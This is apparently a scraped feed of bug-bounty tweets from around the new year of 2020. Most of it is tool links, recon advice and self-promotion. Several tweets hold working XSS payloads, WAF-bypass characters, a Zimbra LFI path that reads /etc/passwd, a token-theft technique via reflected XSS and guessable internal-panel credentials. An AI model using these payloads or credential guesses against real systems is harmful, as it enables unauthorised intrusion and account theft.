@vanshitmalhotra


2020-01-14 17:34:50
1 Active Directory Visualization for Blue Teams and Threat Hunters https://t.co/exGykctRyY Follow #Hackdoor -💰💰💰💰 Facebook - https://t.co/iNczOcGmCt LinkedIn - https://t.co/QyDs7BhC3g Instagram - https://t.co/Q0OxMhKeYV Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip
AkaaZaan
@AkaaZaan


2020-01-14 16:28:30
0 I am giving out $300 to the one who shares a working tip on bypassing Authorization bearer header. #Bugbountytip
robre
@_robre


2020-01-14 15:01:25
0 Create a list of interesting keywords for grep: $ echo "password\ntoken\nsecret\nusername">~/dict/words.txt $ alias secgrep='grep -f ~/dict/words.txt' $ secgrep -r somedir/ somedir/file.php: dbpassword: hunter2 #BugBountyTip #bugbountytips #hacking @TomNomNom
reconness
@reconness


2020-01-14 14:01:58
1 Working on screenshot Agents feature #bugbountytips #BugBountyTip #bugbounty2020goals
Mashoud1122
@mashoud1122


2020-01-14 10:21:07
2 Using a reflected xss to steal FB Auth tokens If login with facebook is available,use the rxss to show the location hash Put the rxss url in the facebook auth flow [redirect_uri] See the magic view the pic for more #BugBounty #BugBountyTip #bugbountytips mistknly deld the old twt https://t.co/NIuW4ennqY
Imran Parray
@CreedHackers


2020-01-14 09:57:31
0 @tirtha_mandal @synack @SynackRedTeam Since you have added #BugBountyTip as a hashtag in your tweet i would like to know how this tweet a bug bounty tip.
Israel Thomas
@IsraelThomas_7


2020-01-14 09:05:29
0 I jus love SSL misconfigurations! :) #BugBountyTip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-14 07:04:51
0 https://t.co/AQ1isKOUi5 Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt LinkedIn - https://t.co/QyDs7BhC3g Instagram - https://t.co/Q0OxMhKeYV Youtube - https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #CyberSecurityTraining #cybersecurity
Mourad
@SecuAudit


2020-01-14 04:03:59
0 i need someone who speak Vietnamese . #bugbounty #BugBountyTip
Mashoud1122
@mashoud1122


2020-01-14 01:22:50
1 Using A Reflected XSS to steal FB Auth Tokens[increase impact] if login with facebook is available use the rxss to reflect the location hash. Put the rxss url in the facebook auth flow[ redirect_uri ]. See the magic view the pic for more #BugBountyTip #BugBountyTips #BugBountyTip https://t.co/xKExO8OAcp
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-01-14 00:58:52
0 Here is another write up for 2fa bypass. https://t.co/CDff0sKP0U … #hacking #bugbountytip #infosec #writeup
dark_warlord14
@dark_warlord14


2020-01-13 18:57:01
0 Hacked up alias for ffuf to store all search results so you can look at them later. #bugbountytips #bugbountytip https://t.co/uDTJUGMTj1
Nick || hunt4p1zza
@ngkogkos


2020-01-13 17:58:38
0 If a subdomain returns a default/under construction or dead page, it may still be worth to run it through @hacker_'s getallurl + @TomNomNom's concurl tools to request all URLs & identify any URLs with different response. See image for commands. #BugBounty #bugbountytip https://t.co/YNXB7uamRY
Numan ÖZDEMİR
@numanozdemircom


2020-01-13 17:57:25
0 Who wanna find Critical (P1) vulnerabilities just in 10 seconds? An easy bounty tip for you. [PHP] Exposing DB Credentials / HttpOnly Bypass / Full Path Disclosure https://t.co/t08E7xzvG5 #BugBounty #bugbountytips #bugbountytip
Ebrahim Hegazy
@Zigoo0


2020-01-13 13:11:57
11 #BugBountyTip When using #Nmap as part of your #Recon arsenal, make sure to add --data-length=50 (or any number in 20~60, the TCP packet header size). Otherwise, Nmap will in many cases return False Positives (i.e. too many open ports, or ports that are not actually open). #TBC
Yadhavi
@PrincessYadhavi


2020-01-13 12:44:10
0 Can I report Exposed google map api key on @Bugcrowd platform program? Is it valid bug? #bugbounty #bugbountytip #bugbountytips
Arif Khan
@payloadartist


2020-01-13 11:56:33
1 I m surprised at how often companies use these credentials in internal login panels: company_name company_name admin company_name employee_name (/github username/from LinkedIn/any public source) company_name #bugbounty #bugbountytip #infosec
Tirtha Mandal
@tirtha_mandal


2020-01-13 09:45:30
1 Thursday's full night hunting finally paid off by @synack. Good start of 2020. Thank you @synack @SynackRedTeam #xss #bugbounty #synack #srt #bugbountytips #bugbountytip #bugbounty2020goals https://t.co/WQWiJCtNPD
OWASP Web Security Testing Guide
@owasp_wstg


2020-01-13 09:22:00
0 When mapping an application, pay special attention to all HTTP requests (i.e. GET and POST), as well as every parameter and form field that is passed to the application. #BugBountyTip #CyberSecurity #infosec https://t.co/D9QWw9BxWm
Lokesh Sonagra
@Anonx_pro


2020-01-13 01:51:02
2 Top Bug Bounty Tools 1. Burp Suit 2. Vulnerability Lab 3. Google Dorks 4. DNS Discovery 5. WAPITI 6. INalyzeR #hackerone #hackers #hack #bugbounty #bugcrowd #python #sqlinjection #programmers #hacks #bugbountytip #ruby #indianhackers #ssrf #developers #bughunters #xxe #hacker
Jason
@zeroauth


2020-01-13 00:35:15
0 Just made a small blog post detailing how I used Frida to bypass SSL cert pinning on a custom cert pinning integration. App developer made their own function instead of using the X509TrustManager. https://t.co/OfYS6ofaBP #bugbountytip #bugbountytips
QSoloX
@QSoloX


2020-01-12 18:27:05
0 How common do you guys find http parameter pollution exploits? Just watched a video from @PwnFunction and was very intrigued about it. Its one of those things that even just a month ago i would have never thought to be possible. #bugbountytip #bugbounty #hacking
Petko D. Petkov
@pdp


2020-01-12 17:48:04
0 Access to the right tools makes a huge difference when doing pentests and bug bounty hunting. How do you know which tool is good/right? Here is the deal. Good tools ultimately save you time - loads of time. #bugbountytip
bug bounty tips - Retweet
@BugbountytipsR


2020-01-12 13:28:27
0 OLD IS GOLD for @bobby6102000 HACKED NORD VPN OLD WD VERSION $$$$$$$$$$$$$$$$$ BOUNTY $500 $$$$$$$$$$$$$$$$$ READ HERE https://t.co/jSxpimqExU #bugbountytips #bugbountytip BTW BOBBY BRUH #IndiaRejectsCAA_NRC_NPR
Pratik Dabhi
@impratikdabhi


2020-01-12 13:18:08
1 Payload for test XSS , SQLI , SSTI vulnerabilities. '"><svg/onload=alert()>{{7*7}} #Payload #XSS #SQLI #SSTI #BugBountyTip
WebSecurityIT
@WebSecurityIT


2020-01-12 12:00:00
0 RT @LooseSecurity: Some useful characters for bypassing WAF(URL-Encoded): %0a%0d %09 %00 %e2%80%ae #bugbountytips #bugbountytip #bugbount…
WebSecurityIT
@WebSecurityIT


2020-01-12 09:30:00
1 RT @godzilla74: Anyone know how long @Akamai typically blocks an IP? Can I file an appeal or something? #infosec #bugbountytip #bugbounty
d0nut
@d0nutptr


2020-01-12 08:44:07
2 If example[.]com points to IP 1.2.3.4 and redirect to www[.]example[.]com but www[.]example[.]com doesn't point to anything (No A, AAAA, CNAME), try submitting your HTTP request to http://1.2.3.4/ with a "HOST: www[.]example[.]com" header. #bugbountytip #bugbountytips
WebSecurityIT
@WebSecurityIT


2020-01-11 20:00:00
0 RT @LooseSecurity: Some useful characters for bypassing WAF(URL-Encoded): %0a%0d %09 %00 %e2%80%ae #bugbountytips #bugbountytip #bugbount…
Rafael Cintra
@RafaelCintraSec


2020-01-11 17:24:37
0 shx_webgame - Resolvendo CTF - Shellter Labs https://t.co/H5AZAr9OaR #hacking #ctf #bugbountytip
Katie Paxton-Fear
@InsiderPhD


2020-01-11 17:00:01
11 New video incoming! 🚨 In this video, we talk APIs. What they are, where to find them, and most importantly how to test them for bugs! We cover: API recon, the most common API bugs and teach you how to find them #bugbountytip #BugBounty #CyberSecurity https://t.co/3hDwOizxwl https://t.co/kPHof1JHtp
ｙｏｄｈｈａ
@y0dhha


2020-01-11 14:52:41
0 Awesome Hacking Tool Lists https://t.co/LauqqrTZ82 #bugbounty #bugbountytips #bugbountytip #android #webpentest #Malware #penteset
Fisher
@Regala_


2020-01-11 14:06:44
2 Tip that has been shared a thousand times but to reiterate: always make a video POC in your reports. It takes 2 minutes and you're covering your future self in case things get fixed, environment change, shit lits on fire. #bugbountytip
Vishnu Vardhan Gadupudi
@vishu10x00


2020-01-11 03:29:38
1 One line to extract urls from a folder #bugbountytip grep -oriahE "https?://[^\"\\'> ]+" *
Abhishek 🕵️
@abhishake100


2020-01-10 17:55:32
2 I just published "My First RCE (Stressed Employee gets me 2x bounty 🤑)" #bugbounty #bug #bounty #bugbountytip https://t.co/11GF7bsr8J
Sourav Sahana
@kernel_rider


2020-01-10 15:34:51
0 Here is another write up for 2fa bypass. https://t.co/ORu7ZWvJjP #hacking #bugbountytip #infosec #writeup
Justin Farmer
@godzilla74


2020-01-10 15:14:02
0 Anyone know how long @Akamai typically blocks an IP? Can I file an appeal or something? #infosec #bugbountytip #bugbounty
OWASP Web Security Testing Guide
@owasp_wstg


2020-01-10 09:22:02
4 When doing search engine reconnaissance, do not limit testing to just one search engine provider, as different search engines may generate different results. 🧑‍🤝‍🧑👯 #pentesting #CyberSecurity #infosec #OSINT #BugBountyTip https://t.co/z3TAwSxZnB https://t.co/SD8uQVh5XC
Digital Business News
@DASummerCamp


2020-01-10 05:15:00
0 In this week's blog, iBaibhavJha writes about how he found a Privilege Escalation Bug in a private Ecommerce. #informationsecurity #cybersecurity #blogger #infosecmatters #writeups #ecommerce #bugbountytip https://t.co/SJLKTZSdRs
Nassec.io
@nassecio


2020-01-10 04:47:33
2 In this week's blog, @iBaibhavJha writes about how he found a Privilege Escalation Bug in a private Ecommerce. #informationsecurity #cybersecurity #blogger #infosecmatters #writeups #ecommerce #bugbountytip https://t.co/tYuY4jldiV
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-01-10 02:19:15
1 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/zUtp0QmdQK
Dr.FarFar 🇪🇬🇨🇦
@3XS0


2020-01-10 00:54:18
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/0GODNlKoK3
Daher Mohamed
@DaherMohamed4


2020-01-09 17:25:00
0 Approx 5k$ bounties for multiple Admin Blind XSS Injection. Thanks @IAmMandatory @Bugcrowd #bugbountytip #bugbountytips Used xsshunter tool for blind xss(s) https://t.co/3vBS224SI2
Renwa
@RenwaX23


2020-01-09 15:22:02
0 OnePlus Bug Bounty Program is Scam #bugbountytip
Oghenejivwe 🇳🇬🗯
@realOghenejivwe


2020-01-09 14:35:34
0 There are very few things on earth more frustrating than spending hourssssssss, looking for bugs and finding none..Worse still in a CTF program! 😑 #bugbounty #bugbountytip #bugbounty2020goals
LivEdOverflow 🔴
@LivEdOverflow


2020-01-09 13:35:27
1 This also works for other embedded services (vimeo, dailymotion, twitter, facebook...)! Thanks for the #BugBountyTip, @̶L̶i̶v̶e̶O̶v̶e̶r̶f̶l̶o̶w̶ @EdOverflow! https://t.co/IoLsH8w4aQ https://t.co/aK4FU9iZ6z
intigriti
@intigriti


2020-01-09 13:05:16
13 This also works for other embedded services (vimeo, dailymotion, twitter, facebook...)! Thanks for the #BugBountyTip, @̶L̶i̶v̶e̶O̶v̶e̶r̶f̶l̶o̶w̶ @EdOverflow! https://t.co/bAE0snqYcZ
Rafin Rahman Chy
@rafinrahmanchy


2020-01-09 12:48:21
0 @intigriti It's not a #bugbountytip 😒
Larouanne Tristan
@Tr4LSecurity


2020-01-09 12:10:14
0 Following the release of the MavenDecoder, here is an article on how to use #maven repository, secure them, and unsecure them: https://t.co/etGTIW5Div #pentest #bugbountytip
Rushiikesh
@u1tran00b


2020-01-09 08:47:01
0 Thank you so much for the awesome swag @Bugcrowd.... Waiting for the P1 Warrior Level 3 swag pack now.......Thanks for being a great platform.... If you are a newbie start your journey with #Bugcrowd #bugbounty #bugbountytips #bugbountytip ❤️❤️ https://t.co/ndXSnTmFpN
Mufeed VH
@mufeedvh


2020-01-08 15:46:26
9 Hey all, I started a youtube channel on bug bounties, programming, and security. This is my first video, an intro about me and the channel. I hope you guys are into memes and stuff. :) https://t.co/U99UY5w2cR #bugbounty #bugbountytip #infosec
STÖK
@stokfredrik


2020-01-08 15:28:44
30 Bug Bounty hunters & Pentesters alike, they all love to run their own domain and DNS Servers to log Out of Band interactions caused by RCEs, XXE's SSRFs and blind requests. And now you can do that too! Better safe than sorry! https://t.co/BgEpHIzjZr #bugbountytip #infosec #howto https://t.co/W5DyPENH5z
Aman Mahendra
@amanmahendra_


2020-01-08 10:44:39
0 Thanks @Hacker0x01 for this amazing hoodie 🔥 #bugbountytip #togetherwehitharder https://t.co/pU6HqPMPC9
Ammar Amer
@cry__pto


2020-01-08 10:06:05
6 #BugBounty tools part (5): HTTPScreenShot:https://t.co/qIuJA1SuJW SubBrute:https://t.co/5i2SI5Dzn7 OnlineHashCrack:https://t.co/zkqBbBh4un Wfuzz:https://t.co/qCK5ghmU5H LinkFinder:https://t.co/k015xUNhCm aquatone:https://t.co/6oxb7sgOhJ #bugbountytip
Christian Folini
@ChrFolini


2020-01-08 09:25:13
0 Working on my first blog post of the year: fingerprinting the #OWASP ModSecurity @CoreRuleSet This is surprisingly difficult, but I do not like security by obscurity, so here we go! #WAF #CRS3 #BugBountyTip
m0z
@LooseSecurity


2020-01-08 01:06:16
6 Some useful characters for bypassing WAF(URL-Encoded): %0a%0d %09 %00 %e2%80%ae #bugbountytips #bugbountytip #bugbounty #infosec #CyberSecurity
Tragger Osbourne
@OsbourneTragger


2020-01-07 17:40:48
0 I am Reversing Engineering the program I made few years ago and trying to Developer some Exploits , I hope 🤞, I will found some #zeroday #bugbountytips #bugbounty2020goals #skills #BugBounty #bugbountytip #Exploit #Pentesting #infosec #togetherwehitharder https://t.co/NtQPLB8oZt
Tragger ⚡️☄️
@NyataraOsborne


2020-01-07 17:35:05
0 I am Reversing Engineering the program I made few years ago and trying to Developer some Exploits , I hope 🤞, I will found some #zeroday #bugbountytips #bugbounty2020goals #skills #BugBounty #bugbountytip #Exploit #Pentesting #infosec #togetherwehitharder https://t.co/waG51ZWIUX
Arif Khan
@payloadartist


2020-01-07 16:38:14
0 Excellent article by @streaak on his recon methodology #bugbounty #bugbountytip https://t.co/UqLBT5AJ3r
AkaaZaan
@AkaaZaan


2020-01-07 16:31:07
0 I want file upload payloads. Anyone guide me to some repository? #bugbountytip
Cryptographer
@crypt0gr4ph3r


2020-01-07 14:55:43
0 #bugbountytip I don't know how and why, I changed the expired token value from xxxxb to xxxxB, and it works 🤣 #hackerone #bugcrowd #bugbounty #hacker101
Sanketh Sharath
@sharathsanketh


2020-01-07 13:20:48
2 The need for making notes and having an organized methodology in bug bounty hunting https://t.co/kgFctJB2PV #bugbounty #bugbountytips #bugbountytip #webhacking
Yassine Aboukir
@Yassineaboukir


2020-01-07 10:21:11
2 I like decompiling older versions of android mobile apps to find deprecated API legacy endpoints as well as hardcoded creds which are surprisingly valid most often. You may use this mirror website for that purpose https://t.co/coCgEd89ly #bugbountytip
Dewanand Vishal
@dewcode91


2020-01-07 05:29:34
0 People who don't know how to approach a target app in bug bounty. Please Read Web Application Hackers Handbook- Chapter4. #intigriti #bugbountytip
GokhanGK
@gkhck_


2020-01-06 20:34:59
2 My first bug bounty writeup. It was a bit inexperienced but I wanted to share :) #bugbountytips #bugbountytip #infosec https://t.co/JGLTMr4BMK
Ammar Amer
@cry__pto


2020-01-06 16:22:32
5 Practice part (3): https://t.co/WPU9fCoxTd https://t.co/ZwkDd9pnFd https://t.co/XUfNhHJFmk https://t.co/XrESMMzbPD https://t.co/e61c34U8tC https://t.co/vLZjeXTwtQ https://t.co/XHVhlnzJjb https://t.co/7okAXhgpZt #bugbountytip #Hacking #PenTest
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-06 13:42:55
0 Every Hacker Will Agree ! 📲🏆💰 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/gesA7tYLqX
dark_warlord14
@dark_warlord14


2020-01-06 11:23:43
0 What can you do with ffuf? 1. Directory bruteforcing 2. Parameter discovery 3. Vhost bruteforcing 4. Parse waybackurls data filtered by status code, response length It's extremely fast. With 200 threads on 1gb ram VPS, I can get 1000 requests per second easily. #bugbountytip
Dan Cimpean
@DanCimpean


2020-01-05 23:11:44
0 GitHub - nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters: A list of resources for those interested in getting started in bug bounties #bugbountytip #bugbounty #infosec https://t.co/ojMfeteDaT
Khaled Mohamed
@xelkomy


2020-01-05 22:06:43
2 Tool #XSpear is very great. @hahwul thanks very much for this tool😅 #bugbountytips #bugbountytip #infosec #xelkomy
Shaked Klein Orbach 🇮🇱
@shakedko


2020-01-05 21:28:25
2 First time I hear about AppBandit by @websecurify (https://t.co/w2W2Rt6205). Have you heard about it? Is it any good? UI seems nicer than Burp's #BugBounty #BugBountyTip #Infosec
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@s0umadip


2020-01-05 20:06:16
0 awesome-forensics:- A curated list of awesome forensic analysis tools and resources. https://t.co/v9MDCYiQnN #bugbounty #bugbountytips #bugbountytip #forensics https://t.co/bvm7JNYaw0
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@s0umadip


2020-01-05 19:49:57
0 Offensive Security Wireless Attacks - WiFu v3 https://t.co/i77ZcVJyiK InfiniteSkills - Mastering Python -Networking and Security https://t.co/PwaSg3aXtV Chosen Books for easiest road to OSCP from my experience https://t.co/8fnP5BkVBi #bugbounty #bugbountytips #bugbountytip
Tirtha Mandal
@tirtha_mandal


2020-01-05 13:44:26
2 I would like to thank my good friend @brutelogic for helping me to bypass WAF❤️❤️ It worked like magic. #xss #wafbypass #bugbountytip #bugbounty
bugbountytip
@a_l_e_r_t_1_


2020-01-05 13:43:38
0 <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> #bugbountytips #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2020-01-05 13:40:51
0 "--!><Script%20/K/>confirm(document.domain)</Script%20/K/> 6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/ '%22--%3E</style></scRipt><scRipt>alert('XSS')</scRipt> "><img src=x onerror=confirm(1);> #bugbountytips #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-05 06:01:38
1 Stay #CyberSafe Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/gyc6PziIKB
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-05 05:57:33
0 Gmail ShortCuts ! Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/pkHRBQI2KK
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-05 04:28:29
3 #OSCP Like VMS ! Lets #TryHarder ! Part 2 — Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/ofajN5TlU9
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-05 04:23:37
0 #OSCP Like VMS ! Lets #TryHarder ! Part 1 — Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/469VcpzzPb
android_security
@pwn0sec


2020-01-05 01:15:15
1 Learning Pentesting for Android devices https://t.co/AR2CVpCENh #bugbounty #bugbountytip #bugbountytips #android
bugbountytip
@a_l_e_r_t_1_


2020-01-04 16:11:56
1 XSS waf bypass challenge... Please share your favorite xss payload for waf bypass... My favorite : ">'><details/open/ontoggle=confirm('XSS')> #bugbountytip #bugbountytips #hackingcommunity
James Nunes
@jamesgnunes


2020-01-04 13:39:08
0 So, @Xiaomi says it has fixed Mi Home Security Camera bug that displayed pictures from other cameras on Google Nest hub. https://t.co/6b5btrAPnk #Xiaomi #Google #bugbountytip #bughead #tech #TechNews #technology #blog #blogger #WordPress
Evan Custodio
@defparam


2020-01-04 00:13:12
0 An HTTP Request Smuggling CL.TE bug lets you redirect a victim connection to a forged endpoint with GET parameters. FYI you can execute a forged graphql query this way on the victim by using: GET /graphql?query=<query> #bugbountytip
m0z
@LooseSecurity


2020-01-03 19:48:43
7 A cool list by @vaib25vicky which indexes useful resources for educating yourself about mobile security! It's a cool area to get into with lots of #bugbounties to be found. https://t.co/AZpQyQNwUN #BugBounty #bugbountytips #bugbountytip
Hendrik
@hendrikvb


2020-01-03 19:46:57
0 Awesome tool to get your target initial recon! #infosec #bugbountytip https://t.co/ysJXq6Yi4t
Bala Elangovãn
@balaelangovan03


2020-01-03 18:47:40
1 My first blog about "How to get started in bug bounty? (Newbie's Perspective)". https://t.co/jHSoKDM7Yo #bugbountytips #bugbountytip #bugbounty
Ammar Amer
@cry__pto


2020-01-03 18:30:16
8 Practice part (2): https://t.co/X281shcjyP https://t.co/spNrTQFgSb https://t.co/vHcoFvviU4 https://t.co/sezBbjXqqh https://t.co/lN4dzsQzSK https://t.co/M9acV7uh2L https://t.co/3wpLokyrgW https://t.co/A1qXCSlOA3 https://t.co/XiR5giK6K9 #BugBounty #bugbountytip #hacking #pentest
noobSecurity
@noobsec_org


2020-01-03 02:00:45
5 P1 on new year (zimbra LFI) [https://t.co/Ab4o1tOu0o]/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 #bugbounty #togetherwehitharder #bugbountytips #bugbountytip https://t.co/NH7meUlaH0
m0z
@LooseSecurity


2020-01-02 20:30:41
1 We are almost at 1,000 members in the League of Bounties discord server! Thanks to all the members who always make it a great chat. :) https://t.co/tVOlrpA4KP #bugbountytips #BugBounty2020Goals #bugbountytip
Arshad Aman
@MeArshadaman


2020-01-02 14:57:03
0 When You Go to HackerOne and see Bounty of $20000 but already claimed by someone else, Then #hacking #cybersecurity #BugBounty2020Goals #bugbountytip @Hacker0x01 @Bugcrowd https://t.co/M6xq9TArVj
Selim Enes Karaduman
@Enesdex


2020-01-02 00:02:45
1 Are all subdomains of https://t.co/UJzSqq2q8o in scope or just https://t.co/I6tTfy4Xfw? I found a bug on a subdomain of spotify but I'm confused about its in scope or not #BugBounty #bugbountytips #bugbountytip #hackerone @Spotify @Hacker0x01 @alicanact60 https://t.co/44Xo60yvM9
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-01 16:23:31
0 #Protip: If a website uses your photo and crops them into the avatar, there may be a good chance that the website is using ImageMagick to do that. Follow Us 💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip
Elsadat ✪
@M0_SADAT


2020-01-01 14:53:06
0 Yaaay, what a great start of 2020!!! Just discovered my 2nd SQL injection on private program @Bugcrowd ! I guess I’m the 1st hacker found P1 on 2020🔥 Happy new year https://t.co/rYxy7EDxzk you made my day😂 #bugbountytip SQLI still alive! #bugbounty #HappyNew2020 #hacking https://t.co/G1GJuet3A4
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-01 12:11:47
3 Thats When We Decided To Become BUG HUNTERS ! ❤️💰💰💰💰 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/Ki3Tvkbeia
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-01 08:45:22
0 Happy New Year Hackers and Bug Bounty Hunters ! Have an Awesome Year with lots of Bounties and $$ Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting https://t.co/7t7Lm5yn0r
drivertom
@drivertomtt


2020-01-01 01:50:28
2 Just curious about whether twitter bots click Like merely by hashtag #malware #APT #cybersecurity #bugbounty #bugbountytips #bugbountytip
m0z
@LooseSecurity


2019-12-31 20:50:41
1 Here are 2 tools which are useful for scraping subdomains/directories in javascript files. https://t.co/VCZ4tzZamU by @jobertabma https://t.co/b0NRR2ub2w by the best hacker in the world #bugbounty #bugbountytips #bugbountytip
m0z
@LooseSecurity


2019-12-31 20:45:48
3 I'm still hosting 2 #XSS challenges on my challenge site! https://t.co/cNYQsW7qVi Both were inspired by real bounties I have found! If you haven't already tried your hand at them, it's well worth a go. #bugbounty #bugbountytip #bugbountytips #infosec
Ammar Amer
@cry__pto


2019-12-31 19:40:35
4 #bugbounty tools part (1): tko-subs:https://t.co/Tawtj1NvWc truffleHog:https://t.co/B3OeZDOdH0 subfinder:https://t.co/QqNOKFuHk1 sslScrape:https://t.co/448jbQ2nbw Gobuster:https://t.co/NI2PnTIFdy SecLists:https://t.co/QPSqeXvWix EyeWitness:https://t.co/461kpUL5CA #bugbountytip
Khaled
@Khaled95677506


2019-12-30 17:34:29
0 My 1st RCE😎 With my bro Osama Alaa. Don't forget to test PHP-CGI, it may give you RCE #bugbountytips #BugBounty #bugbountytip https://t.co/iyLami2sWr
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-30 17:32:47
0 StrandHogg Bug - Unpatched Android OS Vulnerability #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #hackerone https://t.co/8Cr6ShD9jf
Nick || hunt4p1zza
@ngkogkos


2019-12-30 16:58:55
0 Need target specific folders list for fuzzing based on robots.txt? Use @TomNomNom's meg tool: 1. meg -c 200 path.txt urls.txt meg_robots 2. cat meg_robots/index | grep "200 OK" | awk '{print $1}'| xargs cat | grep "Disallow:" | awk '{print $2}' | sort -u #bugbountytip #bugbounty
bug bounty tips - Retweet
@BugbountytipsR


2019-12-30 13:22:23
2 CAN YOU EARN $15000 BY CLICKJACKING? Raushan Raj ========== ^This man did [Tag him if you know his twitter handle] #bugbountytips #bugbountytip WriteuP https://t.co/QhE7nmsJEB
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-12-30 12:21:45
6 ✈️Use Telegram bot as a Penetration Testing Framework 🏆🏆🎖🎖💰💰 Follow this page and learn Bug Bounty Tips and Tricks https://t.co/27kPwhJVdt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone
Larouanne Tristan
@Tr4LSecurity


2019-12-30 10:47:25
0 Doing some #pentesting in a company using #maven ? Look for xml file in the user .m2 folder. This contains password easily decryptable https://t.co/dg9nBqjWoT #infosec #hacking #pentest #CyberSecurity #bugbountytips #bugbountytip #java
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-12-30 10:34:05
0 #burp #bugbountytips #bugbountytip RCE with Burp Suite intruder + Regex https://t.co/JmpAvEfNr3 via @YouTube
Men up
@uppmen


2019-12-30 00:42:39
0 How did I earn $3133.70 from Google Translator? @Google @TranslateTricks #BugBounty #bugbountytip #BugBounty2020Goals ๐Ÿ˜† https://t.co/nVwersBz1n
Dr.FarFar ⓲
@3XS0


2019-12-29 20:53:47
0 Old #bugbountytip from 5 years ago! https://t.co/4o2f9Wgs7A …
ghostlulz
@ghostlulz1337


2019-12-29 19:52:43
13 Source Code Analysis SQLI: https://t.co/m5K3yzo6iU Source Code Analysis XSS: https://t.co/Ke274Lvc9e Source Code Analysis Race Condition: https://t.co/jycSCNE9ms Bug Bounty Book - https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytips #redteam #infosec #xss #dfir https://t.co/vP7FxiOTGH
Nick || hunt4p1zza
@ngkogkos


2019-12-29 18:22:20
0 If you are not using @hacker_'s getallurls Go tool when doing #recon & #bugbounty you are missing out on interesting URLs/endpoints as it fetches from 3 sources: AlienVault/Wayback Machine/Common Crawl. Before using check you are not IP blocked from these. #bugbountytip https://t.co/rj0EjuXs1t
Sahil Ahamad
@ehsahil


2019-12-29 16:11:02
11 Time for #bugbountytip - always look for 3 types of employee in a company from Linkedin or other sources. 1. DevOps/SRE 2. Data Science 3. Tech Interns It will help a lot from your recon perspective and you will be amazed to see the results. #bugbountytips #HappyHacking
ghostlulz
@ghostlulz1337


2019-12-29 15:56:37
